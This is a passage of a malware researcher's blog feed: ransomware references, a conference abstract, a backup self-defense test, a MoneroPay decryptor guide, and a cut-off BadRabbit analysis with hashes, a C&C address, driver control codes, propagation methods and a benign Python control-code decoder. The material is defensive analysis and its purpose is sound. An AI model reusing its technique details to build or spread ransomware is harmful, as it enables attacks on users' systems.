<li><a href="https://blog.talosintelligence.com/2019/03/lockergoga.html">https://blog.talosintelligence.com/2019/03/lockergoga.html</a> </li>
<li><a href="http://id-ransomware.blogspot.com/2019/01/lockergoga-worker32-ransomware.html">http://id-ransomware.blogspot.com/2019/01/lockergoga-worker32-ransomware.html</a> </li>
<li><a href="https://crypto.stanford.edu/~dabo/pubs/papers/RSA-survey.pdf">https://crypto.stanford.edu/~dabo/pubs/papers/RSA-survey.pdf</a> </li>
<li><a href="https://twitter.com/malwrhunterteam/status/1104082562216062978">https://twitter.com/malwrhunterteam/status/1104082562216062978</a></li>
<li><a href="https://www.joesecurity.org/blog/2995389471535835488">https://www.joesecurity.org/blog/2995389471535835488</a> </li>
<li><a href="https://app.any.run/tasks/3f1a7f92-0b43-497b-a17f-d5d31ff55228">https://app.any.run/tasks/3f1a7f92-0b43-497b-a17f-d5d31ff55228</a></li>
<li><a href="https://labsblog.f-secure.com/2019/03/27/analysis-of-lockergoga-ransomware/" target="_blank">https://labsblog.f-secure.com/2019/03/27/analysis-of-lockergoga-ransomware/</a></li>
<li><a href="https://www.mcafee.com/enterprise/en-us/threat-center/threat-landscape-dashboard/ransomware-details.lockergoga-ransomware.html">https://www.mcafee.com/enterprise/en-us/threat-center/threat-landscape-dashboard/ransomware-details.lockergoga-ransomware.html</a></li>
</ol>
</div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-40195763760631965012018-07-31T07:48:00.000-07:002020-01-22T04:33:20.650-08:00VB2018: Artificial intelligence to assist with ransomware cryptanalysis<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPKFBFuDo6AMSwZxCepIKvT8V7QQ3mZgEB-qs41bLxhtIjxCN5Gu4D5Bvipfqifso8Vlzts6NbHn8OpRc_x6oyhNrF4GEZ0roeB9Uunw7MOSOWd9ddn4BkLX7VecDJDoHnkQpwD2KdkFg8/s1600/crypto_code_vb2018logo2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="488" data-original-width="646" height="483" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPKFBFuDo6AMSwZxCepIKvT8V7QQ3mZgEB-qs41bLxhtIjxCN5Gu4D5Bvipfqifso8Vlzts6NbHn8OpRc_x6oyhNrF4GEZ0roeB9Uunw7MOSOWd9ddn4BkLX7VecDJDoHnkQpwD2KdkFg8/s640/crypto_code_vb2018logo2.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
It is always very exciting for me to attend and, moreover, speak at the <a href="https://www.virusbulletin.com/conference/vb2018">Virus Bulletin Conference</a>. It is the oldest and most respected antivirus conference, running since 1991, where cybersecurity experts from academia and industry gather to share their ideas, research, and forecasts. You can meet the researchers who helped build the antivirus industry decades ago and are now the core of the antivirus community.<br />
<br />
This year in Montreal, we will present academic research conducted by my master's student Kateryna Vitiuk under my supervision, devoted to <a href="https://www.virusbulletin.com/conference/vb2018/abstracts/artificial-intelligence-assist-ransomware-cryptanalysis">Cryptanalysis of ransomware with the help of Artificial Intelligence</a>.<br />
<br />
When analyzing ransomware, we often see hardcoded implementations of the AES, RC4 and Salsa20 algorithms, for example in <a href="https://www.nioguard.com/2015/09/teslacrypt-21-analysis-cracking-ping.html">TeslaCrypt</a>, <a href="https://www.acronis.com/en-us/blog/posts/locky-empire-strikes-back">Locky</a>, <a href="https://www.fortinet.com/blog/threat-research/analysis-of-new-globeimposter-ransomware-variant.html">GlobeImposter</a> and <a href="https://nioguard.blogspot.com/2018/02/decryptor-for-moneropay-ransomware.html">MoneroPay</a>. Signature-based approaches, such as the Krypto ANALyzer (KANAL) plugin for <a href="http://peid.has.it/">PEiD</a> and publicly available <a href="https://github.com/VirusTotal/yara">Yara</a> rules, detect the ciphers' code in the ransomware's memory dumps poorly. Therefore, we assumed that a smarter pattern-matching method could be used to find known crypto primitives in the ransomware's disassembled code.<br />
<br />
<u>See also:</u><br />
<a href="https://www.virusbulletin.com/conference/vb2018/abstracts/artificial-intelligence-assist-ransomware-cryptanalysis">https://www.virusbulletin.com/conference/vb2018/abstracts/artificial-intelligence-assist-ransomware-cryptanalysis</a></div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-44375243524400813042018-03-21T07:14:00.000-07:002019-05-05T11:47:58.267-07:00Corporate Backup Solutions Self-Defense Test - March 2018<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh7twYwOpc-1tPK3NKYVtpoi4_I5lb3KQ5iOtvsBuKnKQTH6-KbIaYgTZ21JpGrrolTGM1lmd_5Mo0cGjnwpTQADH9qvUce06B0Zd5EadKuCoTfGcPdMvvwHq7Nz9gRV2f2_seRhQoD0pJ/s1600/self_defense_test.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="750" data-original-width="1316" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh7twYwOpc-1tPK3NKYVtpoi4_I5lb3KQ5iOtvsBuKnKQTH6-KbIaYgTZ21JpGrrolTGM1lmd_5Mo0cGjnwpTQADH9qvUce06B0Zd5EadKuCoTfGcPdMvvwHq7Nz9gRV2f2_seRhQoD0pJ/s640/self_defense_test.png" width="640" /></a></div>
<br />
In light of the growing number of ransomware attacks in which cryptolockers terminate database processes to unlock the database files for encryption (Cerber, GlobeImposter, Rapid, Serpent) and encrypt local and network backups to extort a ransom (Rapid, Spora), we decided to test the self-defense capabilities of the top backup solutions used in business environments that are available for trial.<br />
<div>
<br /></div>
<div>
The test assesses the resilience of each product’s processes and services against the typical attacks on security software described below, as well as the self-protection of local backups and the product’s own files. Ransomware can encrypt the local backup files and the configuration files that belong to a backup program, thereby preventing file recovery. Moreover, once access to the agent’s or server’s processes is gained, an attacker can delete backup copies not only locally but also in the cloud, acting on behalf of the backup solution.</div>
<div>
<br />
See the full report by the <a href="https://github.com/AlexanderAda/NioGuardSecurityLab/blob/master/Test%20Reports/Corporate%20Backup%20Solutions%20Self-Defense%20Test%20-%20March%202018.pdf" target="_blank">link</a>.</div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-12473304687111008272018-02-04T09:21:00.000-08:002018-03-03T04:32:37.601-08:00Decryptor for MoneroPay Ransomware<div style="text-align: center;">
<span id="docs-internal-guid-d1ae88c3-5bae-1b1f-c1df-657161844f2c"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="455" src="https://lh6.googleusercontent.com/ttlWx6y_t1UsOESjBfpsj9uoS6xKwbWz4lWAsh0E00ksZCnOSzaXP5zeaeg4TUX2U_n5ryJz5wMvD92PNm-8Keuxsbe0aBPTV3608J7V3MyaOL-HIg6Am6UJFdEF7t6eq5SRYU81" style="border: none; transform: rotate(0rad);" width="602" /></span></span></div>
<br />
After analysis of the MoneroPay ransomware (MD5: <a href="https://www.virustotal.com/#/file/ababb37a65af7c8bde0167df101812ca96275c8bc367ee194c61ef3715228ddc/">14ea53020b4d0cb5acbea0bf2207f3f6</a>), we managed to patch the binary to turn it into a decryptor.<br />
<br />
<a name='more'></a><br />
The application detected as 'MoneroPay', a ransomware and password stealer in one, poses as a wallet for the SpriteCoin cryptocurrency. The fraud was discovered by <a href="https://twitter.com/malwrhunterteam/status/952259308099653637">MalwareHunterTeam</a> on January 13, 2018.<br />
<br />
The ransomware uses the <a href="https://en.wikipedia.org/wiki/Salsa20">Salsa20</a> stream cipher to encrypt files. MoneroPay derives a 128-bit key from the C&C address ‘jmqapf3nflatei35.onion’ and the %COMPUTERNAME%, %USERNAME%, and %USERPROFILE% strings. Therefore, the MoneroPay decryptor must be run on the same computer, under the same user account, on which the files were encrypted.<br />
<br />
<b>To decrypt the files encrypted by MoneroPay ransomware:</b><br />
<br />
<span style="color: red;"><u>Caution</u>: Use the decryptor at your own risk. We are not responsible for any damage that it may cause.</span><br />
<ol>
<li>Back up the encrypted files (those with the ‘.encrypted’ extension) before decryption.</li>
<br />
<li>Download the archive that contains the decryptor from the GitHub repository: <br /><a href="https://github.com/AlexanderAda/Ransomware-Decryptors/tree/master/MoneroPay">https://github.com/AlexanderAda/Ransomware-Decryptors/tree/master/MoneroPay</a> </li>
<br />
<li>Unpack the archive using the password ‘infected’.</li>
<br />
<ul><li><i><u>Note</u>: The decryptor is a patched version of the cryptolocker and may still be detected as the MoneroPay ransomware by your antivirus.</i></li></ul>
<li>Run the decryptor ‘spritecoind_decryptor.exe’ (MD5: 3749d56abd58dff3d248b91b24da76d7) on an infected computer.</li>
<br />
<ol>
<li>Once started, the decryptor shows a message confirming that decryption has begun.<br />
<img height="154" src="https://lh3.googleusercontent.com/VJ49URdILwhdIdt4PeQekBY781vnaaPrVfMQJdccRNMh_aHrG5cv6MDz8-o8oOFyn4lVRm6qSgUpywZtLB5tUJCrOSuQcBtizrOPdwCdxNOCpowJBu9KrppTSnliP4NQQLIX41PR" style="border: none;" width="403" /></li>
<li>When decryption completes successfully, it shows a message with the status ‘Done’.<br />
<img height="128" src="https://lh6.googleusercontent.com/CT7zwiKYVbRXtQ7gGNTDECZUXhtbY2LuioOCcwrrO2vOUOQMWCMCmOP5Vl7mz171InOK2QYrFkdvdWhllbMKMKTFXEwpKvpH04OSpIll_O6kPEqr7jOvNZwmZUNxhq5qX6g476Nl" style="border: none;" width="119" /></li>
</ol>
</ol>
<br />
<b>To clean up the computer that was previously infected by the MoneroPay ransomware:</b><br />
<ol>
<li>Delete the ‘MoneroPay’ autorun value from the Windows Registry:<br /><br /><i>[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]<br />'MoneroPay' = 'C:\Users\<USER>\AppData\Roaming\MoneroPayAgent.exe'</i></li>
<br />
<li>Delete the ransomware file:<br /><br />
<i>C:\Users\<USER>\AppData\Roaming\MoneroPayAgent.exe</i></li>
</ol>
<br />
Should you have any questions, please email to: ada (at) nioguard.com<br />
<br />
<b>References</b><br />
<ul>
<li><a href="https://www.acronis.com/en-us/blog/posts/spritecoin-new-ransomware-not-cryptocurrency">https://www.acronis.com/en-us/blog/posts/spritecoin-new-ransomware-not-cryptocurrency</a> </li>
<li><a href="https://www.fortinet.com/blog/threat-research/spritecoin-another-new-cryptocurrency-or-not.html">https://www.fortinet.com/blog/threat-research/spritecoin-another-new-cryptocurrency-or-not.html </a></li>
<li><a href="https://www.bleepingcomputer.com/news/security/moneropay-ransomware-disguised-as-wallet-for-fake-spritecoin-cryptocurrency/">https://www.bleepingcomputer.com/news/security/moneropay-ransomware-disguised-as-wallet-for-fake-spritecoin-cryptocurrency/</a> </li>
<li><a href="http://id-ransomware.blogspot.com/2018/01/moneropay-ransomware.html">http://id-ransomware.blogspot.com/2018/01/moneropay-ransomware.html</a></li>
<li><a href="https://sensorstechforum.com/remove-moneropay-virus-spritecoin-restore-encrypted-files/">https://sensorstechforum.com/remove-moneropay-virus-spritecoin-restore-encrypted-files/</a></li>
</ul>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com2tag:blogger.com,1999:blog-4482404627541610819.post-41625875089799160312017-12-22T02:35:00.002-08:002018-03-02T14:18:44.238-08:00VB2017 videos on attacks against Ukraine<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="background-color: white; box-sizing: border-box; color: #555555; font-family: "Source Sans Pro", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; margin-bottom: 10px;">
<div style="box-sizing: border-box; margin-bottom: 10px;">
<span style="background-color: #f5f8fa; color: #14171a; font-family: "segoe ui" , "arial" , sans-serif; font-size: 14px; white-space: pre-wrap;">Thanks to Virus Bulletin for giving me the chance to talk about the most destructive attacks of this year.</span></div>
<blockquote class="tr_bq" style="box-sizing: border-box; margin-bottom: 10px;">
"(In)security is a global problem that affects every country in the world, but in recent years, none has been as badly hit as Ukraine. The most well known malware that affected the country is (Not)Petya, a ransomware/wiper threat that had global impact (it cost shipping firm <em style="box-sizing: border-box;">Maersk</em> alone <a href="http://www.zdnet.com/article/petya-ransomware-cyber-attack-costs-could-hit-300m-for-shipping-giant-maersk/" style="background: transparent; box-sizing: border-box; color: #006633; font-weight: 600;" target="_blank">$300m in lost revenues</a>), but which hit Ukrainian businesses particularly hard. The malware spread through a compromised update pushed out by <em style="box-sizing: border-box;">M.E.Doc</em>'s tax accounting software, which is popular in the country.<br />
In a VB2017 presentation, <em style="box-sizing: border-box;">NioGuard</em>'s Alexander Adamov, himself based in Ukraine, discussed how (Not)Petya and related attacks worked and what impact they had. We have now uploaded the video of his presentation to our <em style="box-sizing: border-box;">YouTube</em> channel."</blockquote>
<div style="text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/8WiIUmocmSI/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/8WiIUmocmSI?feature=player_embedded" width="480"></iframe></div>
</div>
<div style="background-color: white; box-sizing: border-box; color: #555555; font-family: "Source Sans Pro", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; margin-bottom: 10px;">
Read more:</div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="color: #555555; font-family: "source sans pro" , "helvetica neue" , "helvetica" , "arial" , sans-serif;"><a href="https://www.virusbulletin.com/blog/2017/12/vb2017-videos-attacks-against-ukraine/">https://www.virusbulletin.com/blog/2017/12/vb2017-videos-attacks-against-ukraine/</a></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitl81dpruwRNA2wkOVkgRCnwRf1wGiUhqTpxIdZZQNe34gHTBpooNeQKMKqigmnh-Ks2xwDIVbGeICpRAAOlUK2jx9to3XBIZl9VD_lQih_OstMEvfhMDnKQF7I0gemxk1NunBRSJ53IMz/s1600/vb2017_speakers.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="642" data-original-width="1448" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitl81dpruwRNA2wkOVkgRCnwRf1wGiUhqTpxIdZZQNe34gHTBpooNeQKMKqigmnh-Ks2xwDIVbGeICpRAAOlUK2jx9to3XBIZl9VD_lQih_OstMEvfhMDnKQF7I0gemxk1NunBRSJ53IMz/s640/vb2017_speakers.jpg" width="640" /></a></div>
<br /></div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-24761068647386612202017-10-27T06:37:00.000-07:002017-10-28T01:58:21.438-07:00Bad Rabbit Ransomware or Evolution of NotPetya<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs0cErgISh7zLepLVGe50mhVA2yGqQiV6PH9X3uXBjDONX1ivit12csHeLhEJAT8xQEldlaYsbup68XjIkwC2r9ht-4tpRnO10Ue7fxqYFGAnyUc3mQSrZLKwp5NRpql4AytBcrhqQP1Cw/s1600/badrabbit_countdown_crop.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="635" data-original-width="1192" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs0cErgISh7zLepLVGe50mhVA2yGqQiV6PH9X3uXBjDONX1ivit12csHeLhEJAT8xQEldlaYsbup68XjIkwC2r9ht-4tpRnO10Ue7fxqYFGAnyUc3mQSrZLKwp5NRpql4AytBcrhqQP1Cw/s640/badrabbit_countdown_crop.png" width="640" /></a></div>
<b id="docs-internal-guid-c5aa4db3-5e01-d329-0feb-b5b8e4392949" style="font-weight: normal;"><br /></b> <span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;">BadRabbit launched on the morning of Tuesday, October 24, 2017. It was delivered as a drive-by download of a fake Adobe Flash Player installer served from compromised websites. The installer carried a Symantec digital certificate and, when it appeared, was flagged by only 1 of 65 engines on VirusTotal. BadRabbit shares a similar feature set and identical code snippets with the NotPetya wiper, so it can be considered a new version of NotPetya, presumably created by the same author. In the new version, the legitimate DiskCryptor driver is used to install the bootloader and to encrypt the hard disk volumes covertly.</span><br />
<br />
<span style="background-color: white; color: #1d2129; font-family: "helvetica" , "arial" , sans-serif; font-size: 14px;">Main outcomes:</span><br />
<ul>
<li>BadRabbit is a new version of NotPetya, presumably written by the same author;</li>
<li>It is a cryptolocker, not a wiper: the attackers demand 0.05 BTC to unlock the computer and decrypt the data;</li>
<li>Unlike NotPetya, this was not a targeted attack;</li>
<li>BadRabbit spreads over the local network using the EternalRomance exploit against SMBv1, WMI, WebDAV, and NTLMSSP brute-forcing with a list of simple passwords;</li>
<li>BadRabbit uses the legitimate DiskCryptor driver to encrypt disk volumes.</li>
</ul>
Read the full report for more details.<br />
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><a name='more'></a></span></h2>
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Installation</span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The installer’s description says it is an Adobe Flash Player Installer/Uninstaller (MD5: fbbdc39af1139aebba4da004475e8839).</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="180" src="https://lh4.googleusercontent.com/7gY7LhrLH3-NgRfaNj5OZxydpXG7zYU2KWVZRS_j8y2BEGxvuZdze8CFQqAi80_OHB-azvVgBXcaUw-Ghj4gncez2vmQbMxR-1jqykB-mqeQ1E6DyOE1_xnWjIBWw3SuZI-eAgWT" style="border: none; transform: rotate(0rad);" width="419" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The dropper carries a certificate issued by Symantec, but the signature itself is invalid: it does not match the file, so the certificate provides no assurance that the binary is authentic.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="515" src="https://lh5.googleusercontent.com/rE5bSdQW_z5rXQFvB3EGAJB04TX6eF4xfmJpvwCoq0iJwfwY4j2hzim-gDY2V3ACJIO4X1zNeqE8DrYv7TwAmaBe3TPu7WQFAhkvAyrHcz2MBAom6W_m3eLQYR-IUD0cs00bsT-f" style="border: none; transform: rotate(0rad);" width="405" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="378" src="https://lh4.googleusercontent.com/4HrctM7DhxEIL2-q9_u0vkPSxHT_EMG0DcmsND_WjvvOho0Iof4qwHh_eOj08ZzdU-EWwIKSLieX0kPU-R2Ts_Xh3b-yAkwPv9eqUbkH6tLU9fUxkbENZXhVSPBa_SJ7wG8v0k9C" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="217" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The following files are dropped:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">cscc.dat</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (32-bit MD5: edb72f4a46c39452d1a5414f7d26454a, 64-bit MD5: B4E6D97DAFD9224ED9A547D52C26CE02) - the legitimate DiskCryptor driver (</span><a href="http://diskcryptor.net/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">diskcryptor.net</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">), which the manager dispci.exe uses for disk encryption. It is installed as a service named ‘cscc’.</span></div>
</li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dispci.exe</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (MD5: b14d8faf7f0cbcfad051cefe5f39645f) - the manager that talks to the DiskCryptor driver cscc.dat (a.k.a. dcrypt.sys) through DeviceIoControl requests, using control codes such as the ones below to overwrite the MBR with its bootloader and to encrypt the disk volumes:</span></div>
</li>
</ul>
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 72pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IOCTL_DISK_GET_PARTITION_INFO_EX<br />IOCTL_DISK_GET_PARTITION_INFO<br />IOCTL_DISK_GET_LENGTH_INFO<br />IOCTL_STORAGE_GET_DEVICE_NUMBER<br />IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS<br />DC_CTL_LOCK_MEM<br />DC_CTL_ENCRYPT_START<br />DC_CTL_UNLOCK_MEM</span></blockquote>
<b style="font-weight: normal;"><br /></b>
<br />
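<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">When a monitor shows DeviceIoControl requests as raw numbers rather than the names listed above, the first step of triage is decoding them. The following is an added example (not code from the original post, and not DiskCryptor's code) that decodes any control code with the Windows CTL_CODE layout: device type in bits 16-31, required access in bits 14-15, function number in bits 2-13, buffering method in bits 0-1. Only the documented Microsoft codes are named; DiskCryptor's private DC_CTL_* values are not reproduced, so a private code decodes to its device type and function number only. The trace at the end is constructed for the example.</div>

```python
"""Decode Windows DeviceIoControl control codes (CTL_CODE layout).

Added example, not code from the original post or from DiskCryptor.
"""
from collections import Counter
from typing import Dict, List, NamedTuple

METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
          2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
DEVICE_TYPES = {0x07: "FILE_DEVICE_DISK", 0x22: "FILE_DEVICE_UNKNOWN",
                0x2D: "FILE_DEVICE_MASS_STORAGE", 0x56: "IOCTL_VOLUME_BASE"}


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Python equivalent of the CTL_CODE macro from the Windows DDK."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


# The documented codes from the list above, built with CTL_CODE so the bit
# layout is exercised rather than hard-coded (resulting values in comments).
KNOWN: Dict[int, str] = {
    ctl_code(0x07, 0x0012, 0, 0): "IOCTL_DISK_GET_PARTITION_INFO_EX",      # 0x70048
    ctl_code(0x07, 0x0001, 0, 1): "IOCTL_DISK_GET_PARTITION_INFO",         # 0x74004
    ctl_code(0x07, 0x0017, 0, 1): "IOCTL_DISK_GET_LENGTH_INFO",            # 0x7405C
    ctl_code(0x2D, 0x0420, 0, 0): "IOCTL_STORAGE_GET_DEVICE_NUMBER",       # 0x2D1080
    ctl_code(0x56, 0x0000, 0, 0): "IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS",  # 0x560000
}


class Ioctl(NamedTuple):
    code: int
    device_type: int
    function: int
    method: int
    access: int
    name: str


def decode(code: int) -> Ioctl:
    """Split a raw control code into its CTL_CODE fields and resolve its name."""
    return Ioctl(code=code,
                 device_type=(code >> 16) & 0xFFFF,
                 function=(code >> 2) & 0xFFF,
                 method=code & 0x3,
                 access=(code >> 14) & 0x3,
                 name=KNOWN.get(code, "UNKNOWN"))


def describe(code: int) -> str:
    """Human-readable one-liner for a decoded code."""
    d = decode(code)
    dev = DEVICE_TYPES.get(d.device_type, f"0x{d.device_type:X}")
    return (f"0x{d.code:X}: {d.name} (device={dev}, function=0x{d.function:X}, "
            f"{METHODS[d.method]}, {ACCESS[d.access]})")


def summarize_trace(codes: List[int]) -> Dict[str, int]:
    """Count requests per resolved name; unknown codes are grouped by device type."""
    counts: Counter = Counter()
    for c in codes:
        d = decode(c)
        if d.name == "UNKNOWN":
            key = "UNKNOWN@" + DEVICE_TYPES.get(d.device_type, hex(d.device_type))
        else:
            key = d.name
        counts[key] += 1
    return dict(counts)


# Constructed trace (not a real capture): the five documented codes plus one
# made-up private code on FILE_DEVICE_UNKNOWN standing in for a DC_CTL_* request.
SAMPLE_TRACE = [0x70048, 0x74004, 0x7405C, 0x2D1080, 0x560000,
                ctl_code(0x22, 0x800, 0, 0)]

if __name__ == "__main__":
    for c in SAMPLE_TRACE:
        print(describe(c))
    print(summarize_trace(SAMPLE_TRACE))
```

<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">Run it on the codes pulled from an API trace: a run of disk and volume geometry queries followed by requests on an unfamiliar device type is exactly the sequence to expect from a user-mode manager driving a third-party disk-encryption driver.</div>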
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: white; color: #414042; font-family: Arial; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Infpub.dat</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (MD5: 1d724f95c61f1055f0d02c2154bbccd3) - the DLL responsible for file encryption and network propagation (its code is based on NotPetya’s ‘perfc.dat’ payload)</span></div>
</li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
